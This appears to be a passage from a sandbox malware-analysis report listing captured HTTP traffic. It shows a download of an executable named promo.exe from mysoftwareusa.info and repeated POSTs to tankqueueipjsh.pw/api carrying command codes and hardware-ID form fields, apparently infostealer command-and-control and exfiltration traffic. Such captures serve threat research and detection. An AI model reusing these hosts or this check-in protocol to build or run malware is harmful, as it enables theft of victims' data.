Dec 6, 2023 14:34:53.926968098 CET	1340	IN	Data Raw: 85 11 1e e8 5d 0a 1b 34 48 d9 e6 8c 3c 09 1e 42 09 eb e7 e3 c3 a6 27 fa fd d5 5a d7 a4 a8 1c 25 12 0d 23 83 f6 2d 03 20 e5 8d 5b 1a 09 9d 88 9c d7 cc 3a dc 5c 0d 2b b5 d7 7f 67 dc 6d d0 3a de 57 3d 0a 28 5d 2d 2b da 9d 00 5b d9 f6 e7 97 35 95 d6 Data Ascii: ]4H<B'Z%#- [:\+gm:W=(]-+[5nf*hmi~N- )FK]A+"+s8A;0L(c{8].wHw:>n[<5NUcG_mXuydyR#[7&Q_]
Dec 6, 2023 14:34:53.927006006 CET	1340	IN	Data Raw: be 93 51 f6 5e d8 f9 a6 55 e5 e5 be 9c 08 30 b4 7d b2 06 99 79 d7 ed 76 b6 f2 5b 41 7e 2e 89 7d df 3c 31 da 68 ce 0e f5 10 58 42 bf 43 b5 69 56 26 3f f2 ac 3a e8 91 c4 6c 9a 7a 8c af ee 84 3f 77 9c db 44 55 d7 17 28 d4 18 58 9d cc f3 b0 49 a1 be Data Ascii: Q^U0}yv[A~.}<1hXBCiV&?:lz?wDU(XI,k'`?l~[~r!fY_(#L;O``CRk5cnm5:zGqp:lD]e%JEo gLplE1()2;:
Dec 6, 2023 14:34:53.927051067 CET	1340	IN	Data Raw: 66 c1 2e 14 ff f8 e4 28 4c 0c c2 b4 57 6e 21 57 af a3 83 c7 be ba e7 25 71 ce ee d3 a6 6d 33 9a 1f 90 f5 a0 a5 40 52 ef 3f 78 58 b5 c6 ad 4a 90 b7 1c 3f 5b ae c4 d3 60 f3 05 83 b6 62 c6 8b da 3f 09 71 90 cf af 3c 97 57 65 af 14 58 92 9c a7 e4 64 Data Ascii: f.(LWn!W%qm3@R?xXJ?[`b?q<WeXdl?oqGu" EatZ%\|$&&_\z N@[@c:S-\%;MUPSB #-NSpE-{
Dec 6, 2023 14:34:54.106959105 CET	1340	IN	Data Raw: bf f3 73 93 33 c1 77 54 eb e0 da 4e 8a be 1e 86 b8 73 fd 55 84 26 b0 5d e4 18 8a aa 34 96 5f 71 67 49 a6 f3 ee 06 15 e3 c1 85 33 2a c5 d9 30 9d a0 25 35 78 c9 02 38 4e 68 c6 5d fe a8 aa fb 41 70 6b 78 92 de 88 16 54 26 5d 74 e0 de 0f df 8d 03 7f Data Ascii: s3wTNsU&]4_qgI30%5x8Nh]ApkxT&]t{V/'9^px'ryx3a\"Huu\|^&+VI^\|jrIWq^75GAc94YRO]^*Y\|_
Dec 6, 2023 14:35:39.174212933 CET	146	OUT	GET /archives/7 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.4.5 Host: mysoftwareusa.info
Dec 6, 2023 14:35:39.471856117 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:35:39 GMT Content-Type: application/octet-stream Content-Length: 2590208 Connection: keep-alive Content-Disposition: attachment; filename=promo.exe Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 d8 8f fd b9 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 bc 04 00 00 38 03 00 00 00 00 00 00 c0 51 00 00 20 00 00 00 e0 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 51 00 00 04 00 00 35 46 28 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 20 08 00 95 00 00 00 00 e0 04 00 56 35 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 21 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 04 00 00 20 00 00 00 d8 01 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 56 35 03 00 00 e0 04 00 00 f4 02 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 20 08 00 00 02 00 00 00 ec 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 26 00 00 40 08 00 00 02 00 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 77 64 61 69 6f 6e 6e 00 a0 22 00 00 20 2f 00 00 94 22 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6b 67 70 69 75 76 69 00 20 00 00 00 c0 51 00 00 02 00 00 00 84 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PEL08Q @ Q5F(@m V5! @.rsrcV5@.idata @ &@@nwdaionn" /"@xkgpiuvi Q'@

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:35:05.037519932 CET	318	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tankqueueipjsh.pw
Dec 6, 2023 14:35:05.037570000 CET	62	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 6, 2023 14:35:05.392143965 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=in6su9fmq3toujtgj525f3bpan; expires=Sun, 31 Mar 2024 07:21:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PsZ7hv0im8qBjqZ5VmXvT2AXW0x8LnU5YkqwNkolAfFjSwDT6hkvJRG8AHLKfsRHFpxked%2FEAGxSVAFSSJH4XVLF2UJr1Gb5eteknGLizOooljzmaOyXx1m%2BNR%2FgOj%2FWVwvT%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: Data Raw: Data Ascii:
Dec 6, 2023 14:35:05.392167091 CET	104	IN	Data Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 38 66 38 62 64 37 35 32 64 31 37 2d 49 41 44 0d 0a 0d 0a 32 0d 0a 6f 6b 0d 0a Data Ascii: loudflareCF-RAY: 8314e8f8bd752d17-IAD2ok
Dec 6, 2023 14:35:05.392180920 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 6, 2023 14:35:05.393985033 CET	319	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 72 Host: tankqueueipjsh.pw
Dec 6, 2023 14:35:05.394021988 CET	126	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4d 65 44 4e 4e 31 26 6a 3d 65 32 31 31 30 62 33 32 32 35 31 39 31 34 66 36 63 31 30 36 30 34 64 35 31 62 38 39 66 37 61 61 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=MeDNN1&j=e2110b32251914f6c10604d51b89f7aa&ver=4.0
Dec 6, 2023 14:35:05.666970015 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=q7g8hbqrhts7oapc1jm8g8k8fc; expires=Sun, 31 Mar 2024 07:21:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=smlgbd%2FwCZyMVqCuAFR6BO9lwIefiZyNkdx5yAEg3wZkk2kZiOuUdqbMIpMlUW3W8bkfUx%2FDccEHvdlVbyRK8lQANiRdDGFAQxfz5eTjlMUZkdeUoJhhLm4aTylQbREPeD1AsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudf Data Raw: Data Ascii:
Dec 6, 2023 14:35:05.667016029 CET	626	IN	Data Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 38 66 61 66 66 66 32 32 64 31 37 2d 49 41 44 0d 0a 0d 0a 32 31 30 0d 0a 37 44 47 43 6e 76 38 50 6e 59 62 44 32 50 4f 76 66 64 64 6d 44 66 6f 64 79 46 36 65 31 6b 69 52 6d 68 58 59 64 56 30 58 Data Ascii: areCF-RAY: 8314e8fafff22d17-IAD2107DGCnv8PnYbD2POvfddmDfodyF6e1kiRmhXYdV0XPKKXE/S8xTuxpLC90ZUbtgp+nzHqP/r0cuXoYL1Zf3JEgNZq+byaYb+84b2ZzRy7BGyRcrgy/b4k9vJwuxE8e1HHiVTj9JFm8O6u+t+NGK1EN9hQrSr/myni8TelWSY1WczOC6DwlG307qW6lsAatgNslXigMvuwJ
Dec 6, 2023 14:35:05.667051077 CET	1340	IN	Data Raw: 34 61 32 30 0d 0a 44 62 6b 43 59 70 35 33 75 48 79 79 39 43 33 72 75 43 2f 36 4e 7a 52 35 58 63 79 50 56 4b 4c 64 6c 32 37 30 36 4f 4f 50 6b 73 4d 52 73 68 49 76 68 7a 47 7a 66 50 75 34 61 71 75 34 63 37 34 62 50 33 4a 51 78 49 68 65 35 2f 65 51 Data Ascii: 4a20DbkCYp53uHyy9C3ruC/6NzR5XcyPVKLdl2706OOPksMRshIvhzGzfPu4aqu4c74bP3JQxIhe5/eQZ/joqLKazRO6B2mQdK029L4p+/g39Fc4bR6Yzmjt7JBmv/vvo9HKE/VcL5B/rD/xtSb083yxGzB9XsiAVuPyl2z46qS6lsUQuQ9p2DHqO+T0crPUfL4BJDVBjpcT5/DdNb/npbqQzRenBH2cfKwy9bsg/Pl5sB44c
Dec 6, 2023 14:35:05.667087078 CET	1340	IN	Data Raw: 45 72 73 4c 61 5a 42 79 70 6a 66 79 76 53 7a 7a 2b 58 33 36 57 58 39 79 52 6f 44 57 45 39 44 2f 6e 57 33 6b 70 4c 37 30 69 49 30 59 75 55 51 33 32 47 32 67 4e 66 79 33 4a 66 54 38 66 4c 59 53 4f 6e 70 64 79 59 74 61 37 75 36 55 59 2f 66 73 72 72 Data Ascii: ErsLaZBypjfyvSzz+X36WX9yRoDWE9D/nW3kpL70iI0YuUQ32G2gNfy3JfT8fLYSOnpdyYta7u6UY/fsrr+azRK/CG+bP+R8+6xqq7hFtxspclGAkR35vJphv7zhvZXNGrsBYpxyoS7utC/y8HCoGzV+Xs6NWOD9kWzx4aj6340YrUQ32FCpLOq/Kf+4aPQOf3JSgNYT7PCYbPjlqLqS3xi1AGSXc6Qw978h8PJ+uRs5dFDAgFO
Dec 6, 2023 14:35:05.667123079 CET	1340	IN	Data Raw: 35 79 71 7a 50 39 74 43 58 33 38 33 36 38 46 6a 4a 77 55 38 53 63 57 65 76 7a 6b 57 54 7a 36 65 48 30 30 63 6f 48 39 56 77 76 71 58 4b 6b 4d 76 75 69 61 75 79 32 62 76 6f 51 4d 7a 55 47 67 49 39 66 37 2f 2b 53 62 76 7a 6c 71 36 69 44 77 52 61 39 Data Ascii: 5yqzP9tCX38368FjJwU8ScWevzkWTz6eH00coH9VwvqXKkMvuiauy2bvoQMzUGgI9f7/+Sbvzlq6iDwRa9AWOTcawu+rsj8Pt+vR8zf13Hzh2g+4Utp6SCrYHAX6pKdth4pnyk9CL+8H2+EDJyWMmcWuXynWn066e+ks0NswBnm3KnMv+war24cKJXZzVszYBI7/uMZ7/776PRyhP1XC+ccbg3/b8h/f94vx0/elrDgFjh/5Vg8
Dec 6, 2023 14:35:05.667160034 CET	1340	IN	Data Raw: 2b 6a 4f 7a 2f 33 76 36 54 33 39 35 55 4d 57 4f 57 65 62 34 6d 47 76 31 34 61 47 78 6b 73 49 62 73 77 42 67 6d 48 53 6a 50 66 71 78 49 50 6a 2b 65 72 6b 52 4f 54 55 51 67 49 6c 4c 6f 4b 54 64 54 65 54 70 72 62 33 52 30 6c 47 73 52 47 69 55 50 2f Data Ascii: +jOz/3v6T395UMWOWeb4mGv14aGxksIbswBgmHSjPfqxIPj+erkROTUQgIlLoKTdTeTprb3R0lGsRGiUP/J897gu9Ph6uR86cVTFjlvy9J1q7fahs5TBHLUAaZF5qTi8+mr04DfiVxJ5WemJSKDj03S/4636yY0evg5glXysP/exIPL/f7cFPHpRxI5c5vqcYvnjqLuZyl/7RGiAP/J80rMp97ho9A5/clKA1hPl/5pr8Oynvp7
Dec 6, 2023 14:35:05.667201996 CET	1340	IN	Data Raw: 6d 36 45 6a 68 34 55 4d 61 4a 55 4f 6a 34 6e 47 50 7a 37 71 4b 2b 6b 6f 31 52 39 51 4e 33 32 43 66 71 44 66 2b 77 4c 63 48 37 65 66 67 77 4a 57 4e 5a 7a 4a 39 59 37 66 44 66 57 50 7a 71 72 37 32 48 6a 51 44 37 48 53 2b 66 63 2b 70 6b 76 4c 38 73 Data Ascii: m6Ejh4UMaJUOj4nGPz7qK+ko1R9QN32CfqDf+wLcH7efgwJWNZzJ9Y7fDfWPzqr72HjQD7HS+fc+pkvL8s//R3vAUxekzKnFfu+JFj9umuv4PJH6cFap9xpy759GSz/2/6T39PSseeQue+qG7x6qas0dJRrERolD/yfO6mKvj4cLQFPn1Ryo5V6/aeZPvqqLyQwB60BGqYdrgxvPpq9OA34lcIeVXxjUWiyZ5j8eO3+o6DBvUDY
Dec 6, 2023 14:35:05.671864986 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:35:05.932383060 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=5h5rb7u1qdoctiejl04d7etg6m; expires=Sun, 31 Mar 2024 07:21:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SL2Ljo7ciWgQktI2c%2BL9%2FYV79JrC06l0h9PJWjaBPG%2Fj%2BlWC7f8VBunRbkPh9aK5OqhLXxe9%2FQV1Gj7p2VilVuj%2Fb8Pw7NcSqarb9pGIXEy5zrWmXaFvF0o6esGpm4MJc8HtRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server Data Raw: Data Ascii:

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:35:06.031069994 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:35:06.031265020 CET	554	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
Dec 6, 2023 14:35:06.382798910 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:35:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=6bb9stssfd2ofnrgjj4irr1e8c; expires=Sun, 31 Mar 2024 07:21:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kiC53MyAftrA0PXbtIrYHYG%2FwAvBiGmeqBDVmZXo5BkulUjl9xpCOQsCgT1GNcrL4XRXgoVt0FSLu0NHOKMlnOQ0bMMgPrdMVTJ41uwHG244l6t%2BbN3PP9zFyn1WQ0G%2FfgwwoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: clou Data Raw: Data Ascii:
Dec 6, 2023 14:35:06.382837057 CET	120	IN	Data Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 38 66 65 65 64 39 38 30 38 32 65 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: flareCF-RAY: 8314e8feed98082e-IAD15Malformed packet data
Dec 6, 2023 14:35:06.382870913 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:35:06.485714912 CET	335	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: tankqueueipjsh.pw
Dec 6, 2023 14:35:06.485888004 CET	554	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
Dec 6, 2023 14:35:06.849319935 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:35:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=odbbia2upndmt2oqtrfvg76b5a; expires=Sun, 31 Mar 2024 07:21:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rhMkquuJkkbFskMQ48P9mWxi2gCpXX%2F1fhuHkhHBsr8bjaDKsBMkoIEGiOzZo61fBOD36FCjzjEXoPwpLRG17Ia7kVGtgr3ZGZ9evPBNDqBwYMSr3SJsT5TYIilRGaOQruvEtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudfla Data Raw: Data Ascii:
Dec 6, 2023 14:35:06.849338055 CET	116	IN	Data Raw: 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 30 31 63 38 62 63 30 37 66 61 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: eCF-RAY: 8314e901c8bc07fa-IAD15Malformed packet data
Dec 6, 2023 14:35:06.849364996 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0